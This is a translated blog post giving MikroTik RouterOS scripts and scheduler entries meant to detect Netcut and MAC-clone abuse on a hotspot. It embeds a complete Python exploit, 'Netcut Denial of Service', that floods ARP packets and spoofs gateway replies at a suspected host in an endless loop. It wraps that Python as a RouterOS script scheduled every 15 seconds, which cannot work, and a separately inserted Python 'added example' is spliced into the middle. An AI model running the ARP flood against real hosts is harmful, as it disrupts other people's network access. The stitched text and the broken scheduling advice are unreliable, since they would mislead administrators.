Thursday, January 23, 2014

Effectively Handling Vulnerabilities Using MikroTik System Scripts & Scheduler

After a short rest my energy has finally returned, so I decided to continue with the post I promised earlier. This post is a continuation of my previous one, Ampuh Atasi Vulnerability Menggunakan Firewall Mikrotik, and this time it is the third countermeasure against software such as Netcut and MAC-Clone.

I'm sure you all can't wait, right..? hehehe.. Without further ado, let's get straight into this post.

MikroTik System Script:

Log in to your MikroTik router's configuration via Winbox and click New Terminal. Copy and paste the script below:

  • Anti-Netcut 1, 2, 3 + Anti MAC-Clone script

/system script
add name=antinetcut1 policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    source=":local hosts [/ip dhcp-server lease find]\r\
    \n:local pcname \"\"\r\
    \n:local pcnum 0\r\
    \n:global hacklist \"\"\r\
    \n# To log the value of \$hacklist each hour, make debug 1 (if \$hacklist is\
    \_blank, nothing will be logged)\r\
    \n:local debug 1\r\
    \n\r\
    \n:foreach h1 in=\$hosts do={\r\
    \n:local host [/ip dhcp-server lease get \$h1 host-name] \r\
    \n:if ([:len \$host] >0) do {\r\
    \n:set pcname (\$pcname . \",\" . \$host)\r\
    \n:set pcnum (\$pcnum + 1)\r\
    \n}\r\
    \n}\r\
    \n\r\
    \n:local pcnameArr [:toarray \$pcname];\r\
    \n\r\
    \n:foreach h2 in=\$pcnameArr do={\r\
    \n:local hh 0\r\
    \n:if (!([:find \$hacklist \$h2]>=0)) do={\r\
    \n:foreach k in=\$pcnameArr do={ :if (\$k=\$h2) do={:set hh (\$hh + 1) } }\r\
    \n:if (\$hh>2) do={ \r\
    \n:if ([:len \$hacklist] >0) do {:set hacklist (\$hacklist . \",\" . \$h2)} \
    else={:set hacklist \$h2}\r\
    \n}\r\
    \n}\r\
    \n}\r\
    \n\r\
    \n# monitor results in logfile once an hour \r\
    \n:local timer [:pick [/system clock get time] 3 5]\r\
    \n:if ((\$debug > 0) || (\$timer >= \"58\")) do={ \r\
    \n:if ([:len \$hacklist] >0) do={\r\
    \n:log warning (\"New Hacklist: \" . \$hacklist)\r\
    \n}\r\
    \n}\r\
    \n"
add name=antinetcut2 policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    source=":local host\r\
    \n:local ipnum\r\
    \n:local unum\r\
    \n:local usr\r\
    \n:local i\r\
    \n:global hacklist\r\
    \n\r\
    \n:foreach host in=\$hacklist do={\r\
    \n:foreach i in= [/ip dhcp-server lease find host-name=\$host] do={\r\
    \n:set ipnum [/ip dhcp-server lease get \$i address]\r\
    \n:set unum [/ip hotspot active find address=\$ipnum]\r\
    \n:if ([:len \$unum] >0) do {\r\
    \n:set usr [/ip hotspot active get \$unum user]\r\
    \n:log warning (\$host . \" \" . \$ipnum . \" \" . \$usr)\r\
    \n/ip hotspot active remove \$unum\r\
    \n}\r\
    \n}\r\
    \n}\r\
    \n"
add name=antinetcut3 policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    source=":local hosts [:toarray \"comp1,comp2\"]\r\
    \n:local host;\r\
    \n:local ipnum;\r\
    \n:local unum;\r\
    \n:local usr;\r\
    \n:local i;\r\
    \n\r\
    \n:foreach host in=\$hosts do={\r\
    \n   :foreach i in= [/ip dhcp-server lease find host-name=\$host] do={\r\
    \n      :set ipnum [/ip dhcp-server lease get \$i address];\r\
    \n      :set unum [/ip hotspot active find address=\$ipnum];\r\
    \n      :set usr [/ip hotspot active get \$unum user];\r\
    \n      :log warning (\$host . \" \" . \$ipnum . \" \" . \$usr);\r\
    \n      /ip hotspot active remove \$unum\r\
    \n      /ip dhcp-server lease remove [/ip dhcp-server lease find host-name=\
    \$host]\r\
    \n   }\r\
    \n}\r\
    \n:\r\
    \n"
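As an added example (not part of the original post or of the MikroTik scripts above), the Python below models what antinetcut1 detects and what antinetcut2/3 then act on, using constructed DHCP lease records. RouterOS does not run Python; this is only a readable model of the scripts' logic, including a caveat in the script's own duplicate check.

```python
# Added example, not from the original post: a Python model of the detection
# step in antinetcut1 and the follow-up in antinetcut2/3. antinetcut1 walks the
# DHCP leases, counts how often each non-empty host-name appears and treats a
# name seen more than twice as a MAC-clone indicator (several MACs claiming the
# same host-name); antinetcut2/3 then map those names back to addresses.

LEASES = [  # constructed sample of what "/ip dhcp-server lease print" might show
    {"mac": "AA:BB:CC:00:00:01", "address": "192.168.88.10", "host-name": "laptop-ani"},
    {"mac": "AA:BB:CC:00:00:02", "address": "192.168.88.11", "host-name": "pc-kasir"},
    {"mac": "AA:BB:CC:00:00:03", "address": "192.168.88.12", "host-name": "pc-kasir"},
    {"mac": "AA:BB:CC:00:00:04", "address": "192.168.88.13", "host-name": "pc-kasir"},
    {"mac": "AA:BB:CC:00:00:05", "address": "192.168.88.14", "host-name": "kasir"},
    {"mac": "AA:BB:CC:00:00:06", "address": "192.168.88.15", "host-name": ""},
]


def build_hacklist(leases, threshold=2):
    """Mirror antinetcut1: flag every host-name that occurs more than
    `threshold` times among leases with a non-empty host-name. The RouterOS
    script hard-codes the threshold as ":if ($hh>2)"."""
    names = [lease["host-name"] for lease in leases if lease["host-name"]]
    hacklist = []
    for name in names:
        if name not in hacklist and names.count(name) > threshold:
            hacklist.append(name)
    return hacklist


def already_listed_routeros(hacklist_csv, name):
    """Literal model of the script's duplicate check
    `!([:find $hacklist $h2] >= 0)`: a substring search on the comma-joined
    list. Caveat: a host-name that is a substring of an already listed name
    ("kasir" inside "pc-kasir") looks already listed and is never counted,
    so the script can miss a clone of that shorter name."""
    return hacklist_csv.find(name) >= 0


def flagged_leases(leases, hacklist):
    """Mirror antinetcut2/3: resolve flagged host-names back to the
    (host-name, address, mac) tuples the operator logs or removes."""
    return [(l["host-name"], l["address"], l["mac"])
            for l in leases if l["host-name"] in hacklist]


if __name__ == "__main__":
    flagged = build_hacklist(LEASES)
    print("New Hacklist:", ",".join(flagged))  # what antinetcut1 logs as a warning
    for host, addr, mac in flagged_leases(LEASES, flagged):
        print(host, addr, mac)
    print("'kasir' treated as already listed:",
          already_listed_routeros(",".join(flagged), "kasir"))
```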


  • DNS flush script. This script clears our DNS cache, which irresponsible clients dump junk into.

/system script
add name=cacheflush policy=ftp,reboot,read,write,policy,test,winbox,password \
    source="/ip dns cache flush"

  • This script is the Netcut-Killer by MAYASEVEN, written in Python; it can be combined with the scripts above to stamp out Netcut-like and MAC-Clone-like software.

/system script
add name=phyton-anti-net-cut policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    source="#!/usr/bin/env python\r\
    \n#Exploit Title: Netcut Denial of Service Vulnerability\r\
    \n#Author: MaYaSeVeN\r\
    \n#Blog: http://mayaseven.blogspot.com\r\
    \n#PoC: Video  http://www.youtube.com/user/mayaseven\r\
    \n#     Picture http://3.bp.blogspot.com/-GcwpOXx7ers/TwGVoyj8SmI/AAAAAAAAAx\
    s/wSGL1tKGflc/s1600/a.png\r\
    \n#Version: Netcut 2\r\
    \n#Software Link: http://www.mediafire.com/\?jiiyq2wcpp41266\r\
    \n#Tested on: Windows Xp, Windows 7\r\
    \n#Greetz :  ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE, S\
    umedt, Rocky Sharma\r\
    \n \r\
    \nfrom scapy.all import sniff,Ether,ARP,RandIP,RandMAC,Padding,sendp,conf\r\
    \nimport commands,os,sys\r\
    \n \r\
    \n#gw_mac = commands.getoutput(\"arp -i %s | grep %s\" % (conf.iface,conf.if\
    ace)).split()[2]\r\
    \ngw_ip  = commands.getoutput(\"ip route list | grep default\").split()[2]\r\
    \n     \r\
    \ndef protect(gw_ip,gw_mac):\r\
    \n    os.popen(\"arp -s %s %s\" %(gw_ip,gw_mac))\r\
    \n    print \"Protected himself\"\r\
    \n     \r\
    \ndef detect():\r\
    \n        ans = sniff(filter='arp',timeout=7)\r\
    \n        target=[]\r\
    \n        for r in ans.res:\r\
    \n            target.append(r.sprintf(\"%ARP.pdst% %ARP.hwsrc% %ARP.psrc%\")\
    ) \r\
    \n        return target\r\
    \n \r\
    \ndef preattack(gw_ip):\r\
    \n    num = []\r\
    \n    count = 0\r\
    \n    target = 0\r\
    \n    temp = 0\r\
    \n    print \"Detecting...\"\r\
    \n    d = detect()\r\
    \n    for i in range(len(d)):\r\
    \n        if d[i].split()[0] == \"255.255.255.255\":\r\
    \n            num.append(d.count(d[i])) \r\
    \n            if d.count(d[i]) > count:\r\
    \n                count = d.count(d[i])\r\
    \n                target = i\r\
    \n        if d[i].split()[0] == gw_ip:\r\
    \n            temp += 1      \r\
    \n    if len(d) < 7:\r\
    \n        print \"[-] No one use Netcut or try again\"\r\
    \n        exit()\r\
    \n    if len(num)*7 < temp:\r\
    \n        num[:] = []\r\
    \n        count = 0\r\
    \n        result = float(temp)/len(d)*100\r\
    \n        for j in range(len(d)):\r\
    \n            if d[i].split()[0] == gw_ip:\r\
    \n                num.append(d.count(d[j]))\r\
    \n                if d.count(d[i]) > count:\r\
    \n                    count = d.count(d[i])\r\
    \n                    target = i\r\
    \n            num.reverse()\r\
    \n            result = float(temp)/len(d)*100\r\
    \n        print target \r\
    \n    else:\r\
    \n        num.reverse()\r\
    \n        result = float(num[0]+temp)/len(d)*100\r\
    \n     \r\
    \n    print \"There is a possibility that \" + str(result) + \"%\"\r\
    \n    if result>= 50:\r\
    \n        target_mac = d[target].split()[1]\r\
    \n        target_ip = d[target].split()[2]\r\
    \n        print \"[+]Detected, Netcut using by IP %s MAC %s\" %(target_ip,ta\
    rget_mac)\r\
    \n        attack(target_mac,target_ip,gw_ip)    \r\
    \n    else:\r\
    \n        print \"[-] No one use Netcut or try again\"\r\
    \n \r\
    \ndef attack(target_mac,target_ip,gw_ip):\r\
    \n    print \"[+]Counter Attack !!!\"\r\
    \n    e = Ether(dst=\"FF:FF:FF:FF:FF:FF\")\r\
    \n    while 1:\r\
    \n        a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(\
    ),op=1)\r\
    \n        p = e/a/Padding(\"\\x00\"*18)\r\
    \n        sendp(p,verbose=0)\r\
    \n        a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_ma\
    c,op=2)\r\
    \n        p1 = e/a1/Padding(\"\\x00\"*18)\r\
    \n        sendp(p1,verbose=0)\r\
    \n         \r\
    \nif __name__ == '__main__':\r\
    \n    os.system(\"clear\")\r\
    \n    print   \"###################################################\"\r\
    \n    print    \" __  __    __     __    _____   __      __  _   _\"\r\
    \n    print    \"|  \\/  |   \\ \\   / /   / ____|  \\ \\    / / | \\ | |\"\
    \r\
    \n    print    \"| \\  / | __ \\ \\_/ /_ _| (___   __\\ \\  / /__|  \\| |\"\
    \r\
    \n    print    \"| |\\/| |/ _\\ \\   / _\\ |\\___ \\ / _ \\ \\/ / _ \\ . \\ \
    |\"\r\
    \n    print    \"| |  | | (_| || | (_| |____) |  __/\\  /  __/ |\\  |\"\r\
    \n    print    \"|_|  |_|\\__,_||_|\\__,_|_____/ \\___| \\/ \\___|_| \\_|\"\
    \r\
    \n    print   \" \"\r\
    \n    print   \"###################################################\"\r\
    \n    print   \"\"\r\
    \n    print   \"http://mayaseven.blogspot.com\"\r\
    \n    print   \"\"\r\
    \n    if len(sys.argv) == 2 or len(sys.argv) == 3:\r\
    \n        if len(sys.argv) == 2:\r\
    \n            conf.iface=sys.argv[1]\r\
    \n            preattack(gw_ip)\r\
    \n        if len(sys.argv) == 3:\r\
    \n            conf.iface=sys.argv[1]\r\
    \n            gw_mac = sys.argv[2]\r\
    \n            protect(gw_ip,gw_mac)\r\
    \n            preattack(gw_ip)\r\
    \n    else:\r\
    \n        print '''Mode:   \r\
    \n1.)Attack only\r\
    \nUsage: NetcutKiller <Interface>\r\
    \ne.g. NetcutKiller.py wlan0\r\
    \n         \r\
    \n2.)Attack with protect himself\r\
    \nUsage: NetcutKiller <Interface> <MAC_Gateway> \r\
    \ne.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF \r\
    \n'''"

  • Clear-connections script (clears the connection table). You are free to use this script or not.

/system script
add name=clear-connections policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    source=":log info message=\"clearing connections begin\"\r\
    \n:foreach i in=[/ip firewall connection find] do={/ip firewall connection remove \$i}\r\
    \n:log info message=\"clearing connections end\"\r\
    \n"

  • Anti-spoofing script; adjust it to your network.

/system script
add name=ip-spoofing policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    source=":local interfacesubnet [/ip address get [/ip address find where interface=ether3-hotspot] address]\r\
    \n/ip firewall address-list add address=\$interfacesubnet list=ipv4-ether1-gateway-interfacesubnet"


MikroTik System Scheduler:

Next, go back into your MikroTik router's configuration via Winbox and click New Terminal. Copy and paste the script below to run the System Scripts above periodically:

/system scheduler
add disabled=no interval=15s name=anti-mac-clone on-event=":local hosts [/ip dhc\
    p-server lease find]\r\
    \n:local pcname \"\"\r\
    \n:local pcnum 0\r\
    \n:global hacklist \"\"\r\
    \n# To log the value of \$hacklist each hour, make debug 1 (if \$hacklist is\
    \_blank, nothing will be logged)\r\
    \n:local debug 1\r\
    \n\r\
    \n:foreach h1 in=\$hosts do={\r\
    \n:local host [/ip dhcp-server lease get \$h1 host-name] \r\
    \n:if ([:len \$host] >0) do {\r\
    \n:set pcname (\$pcname . \",\" . \$host)\r\
    \n:set pcnum (\$pcnum + 1)\r\
    \n}\r\
    \n}\r\
    \n\r\
    \n:local pcnameArr [:toarray \$pcname];\r\
    \n\r\
    \n:foreach h2 in=\$pcnameArr do={\r\
    \n:local hh 0\r\
    \n:if (!([:find \$hacklist \$h2]>=0)) do={\r\
    \n:foreach k in=\$pcnameArr do={ :if (\$k=\$h2) do={:set hh (\$hh + 1) } }\r\
    \n:if (\$hh>2) do={ \r\
    \n:if ([:len \$hacklist] >0) do {:set hacklist (\$hacklist . \",\" . \$h2)} \
    else={:set hacklist \$h2}\r\
    \n}\r\
    \n}\r\
    \n}\r\
    \n\r\
    \n# monitor results in logfile once an hour \r\
    \n:local timer [:pick [/system clock get time] 3 5]\r\
    \n:if ((\$debug > 0) || (\$timer >= \"58\")) do={ \r\
    \n:if ([:len \$hacklist] >0) do={\r\
    \n:log warning (\"New Hacklist: \" . \$hacklist)\r\
    \n}\r\
    \n}\r\
    \n" policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    start-date=jan/01/2012 start-time=00:00:01
add disabled=no interval=6h name=cacheflush on-event=cacheflush policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    start-date=jan/01/2012 start-time=23:59:59
add disabled=no interval=12h name=clear-connections on-event=clear-connections \
    policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    start-date=jan/01/2012 start-time=21:00:00
add disabled=no interval=15s name=antinetcut1 on-event=antinetcut1 policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    start-date=jan/01/2012 start-time=00:00:02
add disabled=no interval=15s name=antinetcut2 on-event=antinetcut2 policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    start-date=jan/01/2012 start-time=00:00:03
add disabled=no interval=15s name=antinetcut3 on-event=antinetcut3 policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    start-date=jan/01/2012 start-time=00:00:04
add disabled=no interval=15s name=phyton-anti-net-cut on-event=\
    phyton-anti-net-cut policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    start-date=jan/01/2012 start-time=00:00:06
add disabled=no interval=15s name=ip-spoofing on-event=ip-spoofing policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    start-date=jan/01/2012 start-time=00:00:05

Well, that brings my article to an end. I hope it is useful, and see you in my next article.

1 comment:

  1. I'm still a newbie, bro. So every time I enter a script I have to open a 'new terminal', right? So each of the scripts above goes into a different 'new terminal'?
